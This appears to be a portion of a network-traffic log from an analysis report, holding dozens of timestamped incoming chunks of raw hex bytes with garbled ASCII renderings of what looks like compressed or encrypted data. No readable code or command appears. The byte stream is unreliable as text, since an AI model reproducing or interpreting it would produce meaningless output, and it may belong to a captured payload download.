fe dd 7c 41 e4 f2 27 2c 07 92 73 69 f3 5c 22 6b 8f d0 c9 d6 a4 df b3 d0 22 75 0d 30 cd 09 d2 aa e9 a2 4b 15 7c fd 64 1b df bb be ed ed 53 d7 03 b3 d3 2d 63 4e ee 01 93 95 fc 1f 2b 23 08 60 bd ec a5 b9 db 6a 13 f5 82 70 78 83 2f 95 Data Ascii: v'O{%=Q=ISY `3Dg 4v.,bkc[lcU,YYa:U=25a#2G$j"4*MS(?0-,.8S\r\|A',si\"k"u0K\|dS-cN+#`jpx/
2021-11-24 14:07:32 UTC	131	IN	Data Raw: 83 a4 f1 34 10 c6 e7 b2 0e 73 34 66 f3 4e 7d 2e e4 8f d6 ab 5f 69 16 5d 46 2b 5b 8c 1c 44 5e d5 68 a5 0d 5a bf 1c 8e c7 ed 31 10 68 27 7d c1 2e c5 7e 67 7b 73 18 e8 cf 18 37 50 27 c6 86 e0 04 cc 17 5c c8 90 9f c8 85 81 0d f4 a1 e5 13 42 6b 86 e1 1a 88 11 56 14 64 e4 25 c2 5b f4 7f 27 59 67 bc 2a 17 b9 e8 45 8b c3 58 9e a1 65 39 22 91 46 51 63 f6 a6 65 76 b8 b4 73 cb e3 c0 01 1c 8c 05 7a 65 ce dc 9c 06 63 8d 2b 0c 9e e9 f5 e4 b6 34 53 ee 07 d0 bf c2 4f 0a 65 da fa 32 dd 61 8b 34 7d 46 03 55 0b 34 d2 3b 82 67 91 6e 19 61 7f bb 97 fa ef e0 03 df c6 af 8e 69 f5 1c 7e 9c 4e c0 ec 5c c3 c5 88 c6 20 59 34 5f 80 de d3 dd 81 a9 85 c2 a5 56 b8 0c cc 10 64 01 12 71 be a6 8a d0 71 fa fd 3d f5 02 42 88 30 6e 64 40 0f d3 7f 21 fb a1 bf de cf 1f fa ac 66 a3 8a 98 c0 1e Data Ascii: 4s4fN}._i]F+[D^hZ1h'}.~g{s7P'\BkVd%['Yg*EXe9"FQcevszec+4SOe2a4}FU4;gnai~N\ Y4_Vdqq=B0nd@!f
2021-11-24 14:07:32 UTC	132	IN	Data Raw: 52 43 12 3a 5d 42 f6 ab 30 ea 2a 13 8f 64 81 fa 41 9a 14 5d e4 c5 dd d6 f0 39 e9 82 43 c8 3e 4e e9 c1 ba 64 d8 a8 fc d0 9b a2 73 8e 1e 44 99 ea 6b 0b b5 54 4a 36 b3 5c 40 c9 9a 54 74 49 b8 db 77 a2 a0 ed 8a b0 65 7b 76 eb 9c 68 eb ba 9c 8f cc e2 24 81 62 94 1a 08 7b d6 87 e4 fa 0e dd 7d ab a4 07 b0 bf df 5b ca 19 3f 6e 31 6a 03 da c9 b9 e5 47 eb 6e 5a ea da c0 bd 1e d7 8c a5 b5 e1 0e c8 61 85 2a c1 ed d4 14 f2 07 d1 9d 77 b0 5c 55 14 0f f2 ba 49 ea 7b 74 39 3f 05 0f 50 10 fa d6 5e f8 d7 27 8f bc b3 ed 6e 7d 1a 9d 41 79 54 eb 91 fe b0 42 0d 1e 99 c8 ae 34 dd 84 07 3c 59 19 bc f4 a2 d9 a3 5d 7f 51 64 db 56 75 8d 87 c9 94 00 e7 5a fb c1 94 cc 0f 07 70 a5 5a 36 42 48 81 c2 b8 e9 24 33 1d d9 f3 ac 41 46 90 a6 9b 65 c1 45 65 37 c1 63 9f 1c d3 22 4f 18 0d 97 1a Data Ascii: RC:]B0dA]9C>NdsDkTJ6\@TtIwe{vh$b{}[?n1jGnZaw\UI{t9?P^'n}AyTB4<Y]QdVuZpZ6BH$3AFeEe7c"O
2021-11-24 14:07:32 UTC	134	IN	Data Raw: 19 95 0a 95 21 66 ef 0a 55 b5 17 5c 8f 5e e9 57 e5 e2 a2 3e 22 54 10 c2 3b 26 e2 49 99 26 41 51 12 6c f9 a8 66 69 11 7d ce b5 ba f6 b2 2f b4 5e 07 49 5f 4a f8 24 6d c2 94 4d 7f 50 5e f0 db 1a 0c 3b db 2c f4 df 4d 38 5b 8e 4b 59 08 53 1a 90 20 8b 5c 26 19 3d 47 90 88 56 2c d1 2f e4 b2 c2 36 57 18 a9 0f 8b 10 4a ff 40 66 11 09 88 28 f5 77 79 50 0b a8 cb 61 48 a1 59 97 45 6a c2 ad cc 94 17 f6 c9 d6 50 eb b0 a3 ae 6a 7c f9 22 a3 0d 9d 71 a9 43 55 ab 26 00 92 c9 22 74 42 a0 d4 a3 80 4e 47 d8 39 96 77 de 02 c4 92 78 8a 90 a2 0c 7e 36 9e e5 c5 71 e6 78 1d f4 92 1a 88 ac f4 fa 27 cc ca 5e e2 8b 6c 98 29 a5 d8 9d c2 26 35 62 61 15 64 a4 0a 6e 7f 94 fc 1b 13 aa b3 02 cd dd d8 da 03 1f c7 a1 91 0a f0 1e 87 1c c8 20 5f 67 3a b9 e2 97 ca 3b 28 31 88 1f 3d 7b a8 73 f0 Data Ascii: !fU\^W>"T;&I&AQlfi}/^I_J$mMP^;,M8[KYS \&=GV,/6WJ@f(wyPaHYEjPj\|"qCU&"tBNG9wx~6qx'^l)&5badn _g:;(1={s
2021-11-24 14:07:32 UTC	135	IN	Data Raw: 88 53 12 26 1f 6a 1e 02 dc ed 17 b0 81 ab 95 69 2d 42 9a d2 27 d5 bf 2f bb 59 7a 7f 68 91 87 b5 08 e8 c1 cf c8 cf cd 24 9c ae 05 68 cd 72 24 ec 33 be d8 d7 c4 f6 fd 74 78 98 3d 97 c0 26 a6 f6 c7 e4 7f 76 00 e3 56 d9 0d 08 2b bd 1d 09 91 b5 eb 7d b3 5d 93 70 25 b1 bf e0 2e 16 d8 6a f9 19 18 d5 57 a4 0f 85 ac 5b ad 96 6c 91 ec d4 64 07 79 57 09 57 50 02 e9 a4 04 16 3b 39 23 ae 47 e8 6d 50 01 31 37 94 18 69 78 98 2f 62 d3 c7 6d 56 18 e9 6a bb f3 b3 29 a5 ce fb e0 78 c4 29 a8 6d 67 a5 89 a5 f7 ce 0f 2c 4a e8 5a 52 3a fe 42 18 45 e7 a3 c3 83 8e da ef 71 ee c7 fe ba 11 61 01 cb 99 15 d6 b7 89 a3 e4 c1 6c 75 b8 84 78 cc ee 93 47 c1 56 f5 12 6f ef 8b ee 0c 99 82 64 4c 11 1c 0c 3f 08 be 34 7d 69 27 dc 21 e7 bc a2 ba 88 4c a5 9e 12 dc 88 db fb c9 75 e4 63 12 2b 51 Data Ascii: S&ji-B'/Yzh$hr$3tx=&vV+}]p%.jW[ldyWWP;9#GmP17ix/bmVj)x)mg,JZR:BEqaluxGVodL?4}i'!Luc+Q
2021-11-24 14:07:32 UTC	136	IN	Data Raw: 28 2a 61 24 cf 72 c2 1c 08 96 28 6b 81 8e b7 9d 87 fc c0 41 1a 72 4e b2 20 aa e3 76 61 ca 27 c1 ab 74 df 2b 42 ae b6 cc 8d 7f f6 7d 22 88 d1 e5 24 55 56 2d 77 9f 31 2f d6 40 6d fa a0 ba 02 00 35 01 4f f1 54 d1 92 1f a8 65 ea ea 03 1a 1c 18 a1 2e 3a f3 98 c2 1e cf b3 98 1a d3 5b 08 d0 e1 f9 61 4c 0b f3 d9 b0 32 df dd 27 82 e7 61 6c 21 c8 e7 c4 a4 01 72 37 eb bc fe a6 49 9f 88 4b 86 4e bf cc 12 76 e8 08 bc e2 83 c8 6f 70 73 45 ee 14 fc bb d9 b8 20 aa 98 e1 09 78 28 16 04 d6 b3 6d ac aa 04 2a c4 aa 33 db 61 b3 80 4c 10 78 93 3e f0 d7 af fe 3a a5 e6 99 bb 3e 58 90 a6 a4 9a d7 da ca 89 64 92 de 8c 55 a4 35 e7 51 28 78 48 b3 53 63 4f 8f c5 9b 49 bb 0b 7e 7b 20 52 8e fe bb 18 28 41 73 47 54 b7 e8 61 85 7d df 39 f1 39 1a 5c 2c 4d 79 e0 fa dc 71 00 7b 8c 26 d8 6c Data Ascii: (a$r(kArN va't+B}"$UV-w1/@m5OTe.:[aL2'al!r7IKNvopsE x(m3aLx>:>XdU5Q(xHScOI~{ R(AsGTa}99\,Myq{&l
2021-11-24 14:07:32 UTC	138	IN	Data Raw: ef 0a 84 8d 52 ad 3d 92 94 4e 52 39 bb 43 0d 33 24 f1 63 f2 c0 12 06 9a ac 4d d8 7b ce 68 5b a1 27 ff 75 6c c0 4e 81 0d d0 8c 73 d0 68 16 27 e7 08 2e 59 a9 23 97 13 b9 dd 38 3d d3 4e e6 e1 32 bc 8c e2 35 ec ff d7 bf d8 6b 2d 38 f0 44 0b b4 81 c6 ff 6e 41 55 1a 42 7e 66 e8 2e 1c 83 97 5a 60 05 27 22 6c 7e fa 2f db 5e fa 62 d2 38 0c a6 a6 cb 89 33 19 12 78 19 da b0 40 24 81 48 22 9a 43 6c c1 3b cc 54 e2 cc 97 aa 25 2a a5 36 ae a9 c0 1f 33 04 7e 54 75 58 de 2d 4b ef 37 f6 62 05 76 10 56 88 46 e2 1c 3d 0b 34 ce c9 3c 4c 20 b4 75 83 f6 d7 ad 7a 2d 28 62 45 4e 10 a7 45 2c 26 57 25 4f 58 da 69 2f 0d b4 32 a5 7b 43 dd c7 fe 1d ff 90 34 0b 3f 00 b9 3c 0f 34 06 20 33 de a3 29 9b 92 90 2a 9a d2 55 85 d3 c8 6e 42 73 2c 46 41 64 21 59 ad 90 21 d0 e3 0d 99 d4 69 37 9b Data Ascii: R=NR9C3$cM{h['ulNsh'.Y#8=N25k-8DnAUB~f.Z`'"l~/^b83x@$H"Cl;T%63~TuX-K7bvVF=4<L uz-(bENE,&W%OXi/2{C4?<4 3)UnBs,FAd!Y!i7
2021-11-24 14:07:32 UTC	139	IN	Data Raw: 2e 0b 75 10 8f 25 1b e7 41 cf 9a b4 89 68 63 91 7d 34 51 a9 5a d5 bb 15 10 f4 5c c5 5b b1 52 d2 6a 74 59 63 7c 67 3f ae f4 4c c8 b5 13 d6 24 38 8b 90 7f 13 9a c5 74 4e 29 02 8f 1e cd 94 e3 f3 59 11 a1 39 3b de a0 31 7d 6a 5c 78 b3 a3 2a 7e 8c 65 27 f9 4e a3 7c 66 b1 a9 8c 97 8e 44 b6 da 27 6f aa 2d aa 40 6a dd 72 4c 74 5e c6 09 3b 34 59 1b a1 3f b5 c4 ec 74 73 98 62 4e 65 dc 02 81 d0 5b 1e f6 15 14 b0 a2 0e 51 cd 00 d7 ce aa 89 40 44 46 a9 28 85 62 00 e3 59 78 3a 89 d4 f0 f2 94 8f fc 4e dd d1 08 71 8b 95 0a 0d e9 0a d2 c8 e2 97 2e 92 87 7b cb 36 9e c9 66 21 f2 43 c4 2e 8b 5e 2b 59 88 21 ef fb 0f bc 46 91 76 41 5a ef 0d 07 14 e4 af 5d ca 19 35 13 b8 7e 2e 8f e0 52 2d 89 88 fb b8 62 7d ce c4 06 c5 b4 cd b9 59 bb e2 3e fd d8 5b 9b 38 1f ba 5f a9 a2 bb 5e 47 Data Ascii: .u%Ahc}4QZ\[RjtYc\|g?L$8tN)Y9;1}j\x*~e'N\|fD'o-@jrLt^;4Y?tsbNe[Q@DF(bYx:Nq.{6f!C.^+Y!FvAZ]5~.R-b}Y>[8_^G
2021-11-24 14:07:32 UTC	140	IN	Data Raw: a9 f8 86 8d e6 a4 42 be 7e 01 70 08 94 96 e0 22 52 9f 61 c5 7e b5 a9 9b bf 7e 00 12 62 3d b2 bd 8b 49 2b 7a 7f 35 0f 3a b5 c5 95 70 ab 05 cf 69 2b 3e 8c 80 72 1d f2 57 6e fd d8 c1 7d e0 e3 19 ec d0 98 ca 59 25 26 2f 79 59 e5 60 14 f6 95 70 8e ea 55 39 8a c3 00 f1 08 36 8f b2 12 0c 1b 5e ee 1f 68 53 93 a5 7a 5d c0 03 34 2c 86 9c 94 fc c2 e5 71 59 d5 38 ab 2e f4 a2 99 07 2c 2c 11 ef b1 1b 22 12 15 aa cc 7c 8b b5 9b 2d ec 58 f7 01 ac bc 02 a4 32 88 fe 11 57 75 e6 8a 97 cf c3 60 81 d8 4a fd 8d 76 5d 2b 05 a2 34 b2 e3 1e 9c 35 b2 7d 98 8f a8 e8 bc 8e c8 7b f9 50 57 7e 51 a3 3c 96 4e be 48 73 d9 b5 1b f3 c5 fd bb 40 99 79 90 29 19 32 10 08 2d 7d 3f 62 e5 e3 83 83 bf b0 de 7e 20 90 6b cf 28 f8 6d 9e 6e 5e 25 95 03 f5 c0 d7 38 35 29 5f 33 a6 e5 d8 9b c0 e7 0f 5b Data Ascii: B~p"Ra~~b=I+z5:pi+>rWn}Y%&/yY`pU96^hSz]4,qY8.,,"\|-X2Wu`Jv]+45}{PW~Q<NHs@y)2-}?b~ k(mn^%85)_3[
2021-11-24 14:07:32 UTC	141	IN	Data Raw: a5 37 72 10 06 60 63 05 b0 fe 78 57 47 ef 75 22 03 e4 e6 12 a0 dc 5e 91 0f 8c 2c b3 2c 1a d7 46 f1 5e 60 85 9c a9 f0 8c d6 db fe 83 8b 6c 7a 6b a3 0a bf ca 9f d8 93 25 10 92 65 30 ea 57 c4 a1 08 c2 f8 77 3a 34 0e 3f 02 73 87 fb 65 57 13 11 8f f9 8e d5 e6 f4 2e e3 35 f5 4a 8c 48 6d 08 b8 78 39 c3 5a a8 de 81 98 e9 8a 2d 65 f4 dd 9c 86 0c 46 44 78 3a cd db 0d d8 ce 34 35 ea ef 8c 70 26 54 9d 3e 2e 32 a6 c8 61 c1 26 2c 89 f3 75 d5 f0 76 09 11 d1 59 41 98 0b 05 ee 92 e5 ca 85 4f a4 ac a1 08 e5 4f 38 14 8c 00 2d 0c b8 7c c8 3b 07 eb 92 9f 1e 8a 4d 09 d1 ed 9f fb fe 0d 31 a3 4c cc c3 b8 ae d6 da f6 b4 0a 5f c8 ca 7f f6 21 d9 9c 66 24 31 5d 35 70 92 93 69 8a 72 08 bd 9e 65 89 ea 6a b9 e7 ed aa 71 f4 64 93 84 87 fe 60 63 71 28 35 92 51 6a a5 ae 4b dc f7 cc 76 28 Data Ascii: 7r`cxWGu"^,,F^`lzk%e0Ww:4?seW.5JHmx9Z-eFDx:45p&T>.2a&,uvYAOO8-\|;M1L_!f$1]5pirejqd`cq(5QjKv(
2021-11-24 14:07:32 UTC	143	IN	Data Raw: 7a fa d2 49 ff 3a e9 2a 3a ac 6c e6 bc 6a 14 d2 21 02 a3 99 1d 79 1c 04 2c 48 f2 bc 2e 41 c8 45 4a c2 f8 ec 63 12 eb d0 5f 83 0d 41 06 03 58 ad 58 09 e8 42 05 b9 91 75 d2 67 dc 13 21 bb 4d ce 2f f4 bf 01 b0 e2 ab c7 7c 35 09 46 e2 8f 80 18 d9 3e 69 e6 00 d6 04 d8 da 02 b8 eb 5f d1 a1 3e eb cd b4 fc a0 6f 25 b9 ee da 77 3b 15 ce 22 77 8c 73 37 85 7c 07 fc b8 c4 13 16 f7 14 df f2 8b 67 a4 a3 4e 07 1d d0 32 ed 3e 71 49 38 a7 29 e1 33 32 fe d0 7b fe eb d8 4a b9 4c cf 80 23 6f e0 3b 65 b2 75 74 7b 78 4d 0d 88 f6 94 e1 5b 87 d8 1f 1f 25 f2 86 d0 dd c3 9f ac ed cc ef e7 63 10 04 86 9c 8b 0d 32 ff d0 cf 4b c7 70 df 35 fc 8b 3b 86 be 1c 70 d2 f7 f5 04 ba da f3 a3 a3 9b 8d 52 a4 56 b3 9c 8e ad 91 6d 06 c5 aa c3 40 5a 83 5b d1 c0 10 d8 ea fe 15 2c 38 50 70 9d b3 26 Data Ascii: zI:*:lj!y,H.AEJc_AXXBug!M/\|5F>i_>o%w;"ws7\|gN2>qI8)32{JL#o;eut{xM[%c2Kp5;pRVm@Z[,8Pp&
2021-11-24 14:07:32 UTC	144	IN	Data Raw: a6 a6 00 22 71 71 56 e0 a1 68 94 45 d6 a3 47 51 83 74 63 70 7a 93 8c ef 0b dd 59 2d b5 1a 9a 71 c6 ed fe a3 a4 66 b3 6e c0 25 07 0b dc 56 d2 ca 55 c4 15 d8 be 2c 39 fc 7f 5a 59 97 71 79 63 d7 93 74 b4 41 f4 11 3e f2 78 a0 1a 37 b7 b0 cb 9e 67 0f c3 03 d6 6a 38 cb 3e c9 7f 3c fc a7 2d 6f 18 b5 04 02 e2 e8 59 38 bd 82 32 9b 6e 97 f1 ba 62 a2 9a f8 19 7e 92 ac 09 90 e8 6f 80 29 6e b5 30 77 c9 43 40 c9 e3 97 db e1 4a 68 6f a3 24 9d 52 16 78 59 98 18 93 b4 cb 14 0c 0c 14 4d 5a f0 51 43 a8 ed 5a 73 7e 06 66 a7 11 dd 5a 7e 30 42 f9 40 3e 76 48 05 3e 11 99 e5 df e3 6e 00 1e f5 bf 25 10 4b ed 34 58 45 2e 60 0a 30 ac 93 24 c3 54 1c 57 b4 c5 13 49 5e 4a 0e 37 c5 b1 ba e1 c8 55 29 fc 2e bf db 3e 7d 0a bf f6 2b c5 60 32 5f 0c 39 81 bd a0 ce af 23 38 66 31 e8 90 d1 70 Data Ascii: "qqVhEGQtcpzY-qfn%VU,9ZYqyctA>x7gj8><-oY82nb~o)n0wC@Jho$RxYMZQCZs~fZ~0B@>vH>n%K4XE.`0$TWI^J7U).>}+`2_9#8f1p
2021-11-24 14:07:32 UTC	145	IN	Data Raw: 41 93 d4 b6 da bd ce 32 e1 6c 30 fb 36 94 d1 cf 9a a8 19 0e 27 23 0a 40 f7 a5 74 7b d2 61 a0 a3 47 c4 8d e8 37 13 d1 50 aa 3e db 9c 14 d4 d8 42 d5 87 a4 90 e2 04 16 33 7d 70 f1 69 6f a6 55 36 df cd 55 ac 6a db dd 57 e3 48 a5 33 52 d1 82 43 44 be de ff a9 42 c1 c9 a5 97 3f 37 9c 44 13 24 d8 3b 85 c6 4d 2e 3a fa 75 84 06 fc 9c ae 42 fb f5 91 dd 40 8e ce 8d df 6f c8 8b 6f fe 1d 11 66 5e e8 73 10 96 8d 33 e8 3e f8 5e ef 49 30 12 7f 85 43 93 9c be b7 2c cd 21 2a 7e ef 67 1c 34 4c 10 67 a9 97 43 fe 4a af df c4 cd c0 91 30 2b a3 64 4e 65 b6 9f c1 49 a0 22 0a c1 5a 27 5e 8b 1e 65 2c f9 ab 3c 4e e5 91 ad a0 36 6a e9 44 c2 af 55 ec 73 05 68 7d e4 68 e1 97 0a 03 c2 71 95 b2 67 eb a5 96 81 36 ec 0e 01 a3 08 03 74 49 03 70 ea 10 d1 97 09 93 c9 e8 83 14 48 ef 50 b8 41 Data Ascii: A2l06'#@t{aG7P>B3}pioU6UjWH3RCDB?7D$;M.:uB@oof^s3>^I0C,!*~g4LgCJ0+dNeI"Z'^e,<N6jDUsh}hqg6tIpHPA
2021-11-24 14:07:32 UTC	146	IN	Data Raw: 73 a9 5a d7 fa 8c ce 79 4a c4 bb b0 28 b1 ba 03 b0 84 49 10 47 c3 be bc 8c c8 53 8f b2 7b 02 d3 af eb 38 e4 73 6d 3e 6d 7e 39 60 d2 84 54 91 dd d4 c5 ee 77 20 36 6a bc 03 b8 7d 8b bc 52 94 ea d0 4a 03 63 c2 4c c3 32 3f e8 b2 7d 22 4a 22 a1 7d 19 b3 b2 cd d3 c1 c4 da 7c 49 38 05 ed 0a 32 18 0c c2 33 61 75 2e 77 d5 42 90 17 4f c4 02 f5 54 fc 59 3f 34 f9 a4 56 25 6b 90 e4 0a 4e e1 a4 ce 14 27 fb f1 98 97 72 33 c6 ec ca d6 97 65 51 b5 a0 8e 0a 5e 8e 65 8d 3e 9a bc 78 ca 0f 74 3b 58 94 09 80 e5 dd 9e 10 b3 1a 13 8f e2 0c 92 16 dd f2 0c 7e 0d fb d3 c9 96 92 18 fd 6b fd 1f 88 5c a7 d1 17 a0 06 ec 7c 5b 93 06 ff 05 67 0d 04 1e 80 cf 7d ce 64 84 62 21 97 a6 c8 23 89 5b cd ec 0d 6a 30 73 16 ab f0 bc ab 17 26 e8 df b7 9d 1e 35 fb e6 79 0d 0e 08 71 ee 00 44 13 a4 ee Data Ascii: sZyJ(IGS{8sm>m~9`Tw 6j}RJcL2?}"J"}\|I823au.wBOTY?4V%kN'r3eQ^e>xt;X~k\\|[g}db!#[j0s&5yqD
2021-11-24 14:07:32 UTC	147	IN	Data Raw: 6f 73 ba 3a 1d 51 81 24 ea 25 08 9c b2 8d 65 e0 2d 41 67 db b4 3f 71 8b 3b eb 9d 62 e0 b4 74 c9 fe de f8 7f 5a 73 bd 51 64 45 14 90 58 2e 7d 45 65 11 7d 51 72 db 19 3b 85 f2 2b 1e e3 e0 7d 31 d0 2e ec e5 36 b4 1b 60 63 a5 62 a4 77 86 f1 a1 b9 8f fb 8b 61 a6 48 0f e9 0a 3b 0b 75 74 07 eb ca d1 0b 56 c9 d3 2d c8 4a 34 e8 d4 54 cd e6 84 b3 75 a9 46 2f 5f ae a5 68 74 6f 4b 94 41 48 bc 12 97 bf 49 f6 e9 e6 f5 e9 69 ec 61 0f 97 5d 4d 7f e9 74 1c dc 6f 3f 64 5a 4e 9e e6 f1 01 9e 80 7e d1 40 64 9f 40 22 9e 97 20 16 ff a1 0d 6f 7c cc ab 4d b8 35 7a 0a c7 1c 6b f9 9b ff d3 9b 76 c1 ab 16 1f c2 a2 c4 66 0b 8d a5 0f b6 74 39 26 d4 54 d3 e9 dd 8d 9f 82 78 67 4c 56 3c c3 22 85 12 4d ff d0 3b da 0d 74 7a d6 eb 72 74 99 01 c7 2f 06 1a c0 96 03 62 d6 4c 56 0a 9a 66 f1 34 Data Ascii: os:Q$%e-Ag?q;btZsQdEX.}Ee}Qr;+}1.6`cbwaH;utV-J4TuF/_htoKAHIia]Mto?dZN~@d@" o\|M5zkvft9&TxgLV<"M;tzrt/bLVf4
2021-11-24 14:07:32 UTC	148	IN	Data Raw: 3b a2 ce e6 aa 33 37 c8 21 21 8c 4b cd 35 a7 ff 4e 38 3e f2 5d ff b6 28 e5 db b3 8e 1f 61 73 34 38 3d 39 1f 84 52 86 39 0a b3 5c 13 93 ec fa b0 63 47 be e3 14 39 5a b2 62 db 43 2d 65 66 29 60 70 80 b4 30 69 68 88 79 ba 0f d8 7b 1e f9 b5 ca 19 19 ec 3d fb 2c 94 71 af 3e e8 b7 19 f9 3a ea 01 aa ba a0 b8 43 38 0f ff 55 37 2f fb 9e 88 34 f9 c4 5e a3 0a 7e 6a aa b4 d1 6f 2b 28 cf 8d 86 6e 4f 35 f8 35 5f e7 3f 6c b0 7e 11 5e 11 b7 42 09 a6 f4 cb a2 71 b0 cd b0 51 b2 f9 1b 14 55 ac 95 00 83 c8 b7 b6 aa 93 62 b0 b1 62 a2 79 54 40 15 e5 33 5a 3c bc db 62 f8 c2 e5 f2 c4 d1 c8 bc 9e 71 67 eb 6d c8 ca 6b c9 df fb 18 a7 2d 5b 8a 55 a3 b4 3d 73 57 9d 51 25 84 44 ba 2f c3 bd 84 a0 2f 59 c0 92 4b e3 d3 1a a1 33 22 2f a5 06 7a 7f a9 a4 76 fd 8f 3a 5e 08 cb 56 0c 6c 31 be Data Ascii: ;37!!K5N8>](as48=9R9\cG9ZbC-ef)`p0ihy{=,q>:C8U7/4^~jo+(nO55_?l~^BqQUbbyT@3Z<bqgmk-[U=sWQ%D//YK3"/zv:^Vl1
2021-11-24 14:07:32 UTC	150	IN	Data Raw: 01 2d 06 fb fd 0b e5 bb 95 f0 69 80 43 6b ee b3 1e 97 e0 34 6f e6 34 35 01 49 c6 91 8e 48 32 50 e4 7c 5f 0e 30 2d 69 8c b5 7c 5b 0a bb f3 d3 58 b5 29 9d 69 ec 5c de c0 ba 53 08 69 dc 51 28 26 24 15 70 a5 60 76 91 06 bf 7d 85 ae ab 31 05 40 58 fb 8d dd 69 f5 d8 36 0c 16 a6 44 b6 83 33 a6 6d 8d 95 19 ea dc 3d ed 19 ac 44 5a 35 15 f0 55 77 08 93 81 80 d8 98 1f 80 b8 5e 65 a3 80 5c be d4 c9 4a ee c2 e9 c3 61 96 e4 82 ad 9d 36 d9 51 1f 36 a4 f3 de dc 25 b2 eb 1a 1d f8 e4 00 de 67 97 5f f6 a0 52 15 e5 7d 4e 2e 3c e6 ee de 5c 2b f8 e9 de 60 aa 08 a7 57 3d a2 a7 55 db da 38 7f cb 95 af 9d d0 9d f4 28 60 31 f8 12 a9 36 23 38 3c 2b d5 6f 2a 07 5e 0a 88 3b e7 79 e7 67 bb 47 2f 42 5a b6 0a 48 92 25 68 52 75 be 03 e8 d5 eb d4 9e 83 b6 ad 1b 77 84 75 b2 9a 15 96 50 55 Data Ascii: -iCk4o45IH2P\|_0-i\|[X)i\SiQ(&$p`v}1@Xi6D3m=DZ5Uw^e\Ja6Q6%g_R}N.<\+`W=U8(`16#8<+o*^;ygG/BZH%hRuwuPU
2021-11-24 14:07:32 UTC	151	IN	Data Raw: fc 1e 90 65 e9 a8 e3 43 50 f7 66 bc af 2d 46 82 a1 99 c6 93 57 ce 3e 6c f5 b0 df 7b 02 1e 60 fe f6 8a b3 59 91 ec c3 1b 78 4d 50 ac f0 cc 97 e1 1c b9 e7 a0 07 29 8a 68 1a 93 c2 19 b7 20 4d f6 de b6 88 f8 55 e1 66 1f 3a 47 f1 69 a4 a4 af ad a6 33 46 df 11 ae fd 88 d8 e9 fb d1 74 52 4c a9 f2 af 52 36 31 78 99 7e 3a 01 4a 94 f8 fe 77 4d 00 17 7b 04 38 12 c7 32 b5 b2 76 5c be 2d 5b b0 da b6 1a 7e 48 11 8d 7e 08 08 f3 e8 50 0d cb ca 31 a7 8c a1 4a 87 79 34 5e 68 a0 3c 02 5d a6 1c 6a cc b3 f3 b4 f2 47 be f2 89 45 73 89 89 17 0a dd 5d 65 ac 24 93 86 df ad bd 68 e5 eb 3d e1 0c ba 21 6a 57 4e 50 7a 53 33 47 15 6f be 27 66 3c 05 3d a2 f0 3e be c5 e1 3d ac 2d c4 ff 6e 77 fb 71 9e 64 97 50 af 51 21 2e 49 55 ee 97 e3 ea 9d a3 16 eb e8 8b 34 3b 83 33 10 9e 03 64 c4 71 Data Ascii: eCPf-FW>l{`YxMP)h MUf:Gi3FtRLR61x~:JwM{82v\-[~H~P1Jy4^h<]jGEs]e$h=!jWNPzS3Go'f<=>=-nwqdPQ!.IU4;3dq
2021-11-24 14:07:32 UTC	152	IN	Data Raw: b4 e6 06 78 bc 52 5a b5 61 bb b4 1d 29 ec 58 a4 fb 9b 9c df 57 f5 c0 cf 0a 33 da e1 74 1b 93 f8 3c 92 45 8a 2b 83 f7 ea 23 0b 92 0c 88 ad d7 1c 65 ed aa 51 e8 88 fa 01 69 15 27 1e f8 9b 97 f2 d8 0a f2 ea 85 aa 06 5c 15 27 db fb 6b 31 fb f5 f4 be 94 d4 17 ee 82 82 1e 51 d5 82 70 f7 2c 36 a7 62 25 be 14 c5 04 82 ce d9 2c d6 16 e0 fb 34 ce de 78 f0 a5 0d 8f fe 27 75 9a 68 f0 9f 8a bf 59 41 f3 19 1d da 21 c3 1b 76 6d 4d 5c 82 dc 97 ed be 9c 8b d8 a9 cc 25 bb 46 71 39 76 2e 7e e1 19 63 6e 31 a5 34 f4 3c 65 5b b7 ef cc 13 bd 2c 86 e7 aa 8d 3d 33 c4 e4 fc e0 f0 fe 43 2a a1 c1 80 a5 e2 5c 4b 1f 21 d9 ae 08 d4 78 74 2c bd 49 cb 00 bc eb 91 56 34 f6 95 36 f6 40 5b c1 39 79 6e e2 ed 82 6a 20 aa 5f 52 7c 44 e5 f9 2f 08 95 c3 20 d6 9f b7 e4 8f b0 50 e1 91 13 5b 38 61 Data Ascii: xRZa)XW3t<E+#eQi'\'k1Qp,6b%,4x'uhYA!vmM\%Fq9v.~cn14<e[,=3C*\K!xt,IV46@[9ynj _R\|D/ P[8a
2021-11-24 14:07:32 UTC	154	IN	Data Raw: 68 0b eb 5f cd 04 45 d0 3c ee d6 88 d6 a8 2b 72 50 cd 40 31 79 43 6f 33 44 3a d3 cd 96 b5 dd 36 07 09 5b 48 8b 70 f5 29 3e 9a 5e dc 30 aa b5 bd c3 68 c6 30 a9 40 ce 12 a0 90 33 2f b1 7d 00 6e 1e 9c 16 01 d3 58 3c cf a8 98 09 46 29 c6 53 e6 64 1d fe 2e ca df e4 44 0a bc 48 c8 04 dc fe f4 09 03 15 fb f5 d2 c8 50 f2 b7 8c dc 0d 69 82 de 36 75 6f f3 8c 22 f1 cc 59 27 81 ce 50 c9 4c 89 ea 38 aa d1 8f 47 34 94 2f 1c aa e0 97 6c f2 6d da 35 34 67 7f c7 5b 2c 57 2d 9a 54 0d fd e0 92 8f 6b e3 f3 f3 94 05 e8 18 52 c5 bf 42 a8 33 45 9d 4d b2 1b 2d 30 3b 61 2b e1 04 b7 e1 04 1c 35 33 41 91 26 07 48 cf 03 aa 38 69 f1 84 9d 04 89 86 17 1c 25 1f b8 23 d5 85 ac 99 5f 1c 95 ed 21 ec 66 e1 5d 6b dd b0 8b 2b 5a de 0f 7a 04 81 e1 33 55 3f 01 2b 01 de fc df b1 13 00 b7 b2 a6 Data Ascii: h_E<+rP@1yCo3D:6[Hp)>^0h0@3/}nX<F)Sd.DHPi6uo"Y'PL8G4/lm54g[,W-TkRB3EM-0;a+53A&H8i%#_!f]k+Zz3U?+
